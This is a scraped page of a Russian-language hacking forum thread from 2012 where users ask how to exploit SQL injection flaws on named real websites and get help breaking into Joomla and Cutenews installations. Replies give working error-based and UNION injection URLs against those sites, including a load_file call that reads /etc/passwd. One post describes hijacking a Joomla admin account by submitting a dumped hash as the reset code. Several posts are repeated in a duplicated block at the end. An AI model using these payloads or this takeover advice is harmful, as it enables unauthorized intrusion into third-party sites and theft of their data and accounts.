Вопросы по уязвимостям - Страница 250

devv · 07.11.2012, 03:52

Возможно ли раскрутить данную скюлью?
http://www.aromline.ru/index.php?searchstring=sql%5C'&offset=400

И ету: http://www.publicdomainpictures.net/sponsored_pictures.php?page=495'
Но первая важнее

kritoto · 07.11.2012, 06:21

Цитата:

Сообщение от devv

Возможно ли раскрутить данную скюлью?
http://www.aromline.ru/index.php?searchstring=sql%5C'&offset=400

И ету: http://www.publicdomainpictures.net/sponsored_pictures.php?page=495'
Но первая важнее

http://www.publicdomainpictures.net/sponsored_pictures.php?page=495%20and%28select+1+f rom%28select+count%28*%29,concat%28%28select+table _name+from+information_schema.tables+limit+58,1%29 ,floor%28rand%280%29*2%29%29x+from+information_sch ema.tables+group+by+x%29a%29--

Flakt · 07.11.2012, 14:19

[QUOTE=devv;29436]Возможно ли раскрутить данную скюлью?
http://www.aromline.ru/index.php?searchstring=sql%5C'&offset=400

_http://www.aromline.ru/index.php?type=1+and+1=0+union+select+load_file(0x 2f6574632f706173737764)+from+mysql.user+--+

Iwashka · 07.11.2012, 14:21

Здравствуйте.
Возможно ли на Cutenews 1.3.1 что-нибудь сделать, если у нас аккаунт редактора и нет прав на заливку картинок?
Нашел:

Цитата:

http://seclists.org/bugtraq/2006/Nov/521

Но не понимаю, как его применить. Т.е. я должен залить на любой другой сайт текстовый файл с командами РНР и тогда я смогу его выполнить или как?

Untitled · 07.11.2012, 18:27

Iwashka
Вся суть баги по ссылке в register_globals = On, что сейчас маловероятно. С самой CMS не сталкивался.

spari · 07.11.2012, 23:27

devv,
about aromline.ru,the injection point is here-

Код:

select count(*) from table where column like (data or (column like '%[injection]%' or column like '%[injection]%' or column like '%injecion%'))

also,there is whitespace,so we can avoid that and execute our error based injection (since union cannot be with count(*)) like that-

Код:

http://www.aromline.ru/index.php?searchstring=\'))or(1)group/**/by(concat(version(),0x0,floor(rand(0)*2)))having(min(0))%23&offset=400

about publicdomainpictures.net
you can execute union like that-

Код:

http://www.publicdomainpictures.net/sponsored_pictures.php?page=495 and 540 div 0 union select 1,2,3,4,5,6-- -

but no column,so you better use error based.
Iwashka,
its call Remote File Inclusion,learn some-
http://en.wikipedia.org/wiki/Remote_file_inclusion

kingbeef · 09.11.2012, 02:07

Цитата:

Сообщение от Sin3v

Есть SQL Inject на Joomla 1.5.*
Вывел административную учетную запись, хеш брутиться.
Привилегий на запись/считывания файлов нету.
Что еще посоветуете выдернуть чтоб получить доступ к сайту?

https://forum.antichat.ru/showpost.php?p=3334209&postcount=22

Хэш в мд5 и меняй пасс.

kingbeef · 09.11.2012, 10:47

Цитата:

Сообщение от Sin3v

Спасибо, хороший способ.
А вот насчет:

Что то я тебя не понял?

Хэш с солью,что ты вынул ты переводишь в мд5 и ставишь тут /index.php?option=com_user&view=reset&layout=confir m как код подтверждения.

Jeff · 09.11.2012, 21:24

Цитата:

Сообщение от Sin3v

Не работает так, там другой хеш генерируется который на почту приходит, если тестить на тестовом аккаунте.

Вроде как приходит md5(default_hash), но сам еще не тестил

recfrf · 09.11.2012, 22:15

Цитата:

Сообщение от Sin3v

Есть SQL Inject на Joomla 1.5.*
Вывел административную учетную запись, хеш брутиться.
Привилегий на запись/считывания файлов нету.
Что еще посоветуете выдернуть чтоб получить доступ к сайту?

точная версия? или хотя бы строчку version из configuration.php-dist

07.11.2012, 03:52	#2491
devv Регистрация: 08.10.2012 Сообщений: 27 Репутация: -4	Возможно ли раскрутить данную скюлью? http://www.aromline.ru/index.php?searchstring=sql%5C'&offset=400 И ету: http://www.publicdomainpictures.net/sponsored_pictures.php?page=495' Но первая важнее Последний раз редактировалось devv; 07.11.2012 в 03:56..

07.11.2012, 23:27	#2496
spari Регистрация: 10.09.2012 Сообщений: 46 Репутация: 24	devv, about aromline.ru,the injection point is here- Код: select count() from table where column like (data or (column like '%[injection]%' or column like '%[injection]%' or column like '%injecion%')) also,there is whitespace,so we can avoid that and execute our error based injection (since union cannot be with count()) like that- Код: http://www.aromline.ru/index.php?searchstring=\'))or(1)group/*/by(concat(version(),0x0,floor(rand(0)2)))having(min(0))%23&offset=400 about publicdomainpictures.net you can execute union like that- Код: http://www.publicdomainpictures.net/sponsored_pictures.php?page=495 and 540 div 0 union select 1,2,3,4,5,6-- - but no column,so you better use error based. Iwashka, its call Remote File Inclusion,learn some- http://en.wikipedia.org/wiki/Remote_file_inclusion

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

07.11.2012, 14:19	#2493
Flakt Регистрация: 18.02.2011 Сообщений: 90 Репутация: 0	[QUOTE=devv;29436]Возможно ли раскрутить данную скюлью? http://www.aromline.ru/index.php?searchstring=sql%5C'&offset=400 _http://www.aromline.ru/index.php?type=1+and+1=0+union+select+load_file(0x 2f6574632f706173737764)+from+mysql.user+--+

07.11.2012, 18:27	#2495
Untitled Регистрация: 24.06.2012 Сообщений: 131 Репутация: 30	Iwashka Вся суть баги по ссылке в register_globals = On, что сейчас маловероятно. С самой CMS не сталкивался.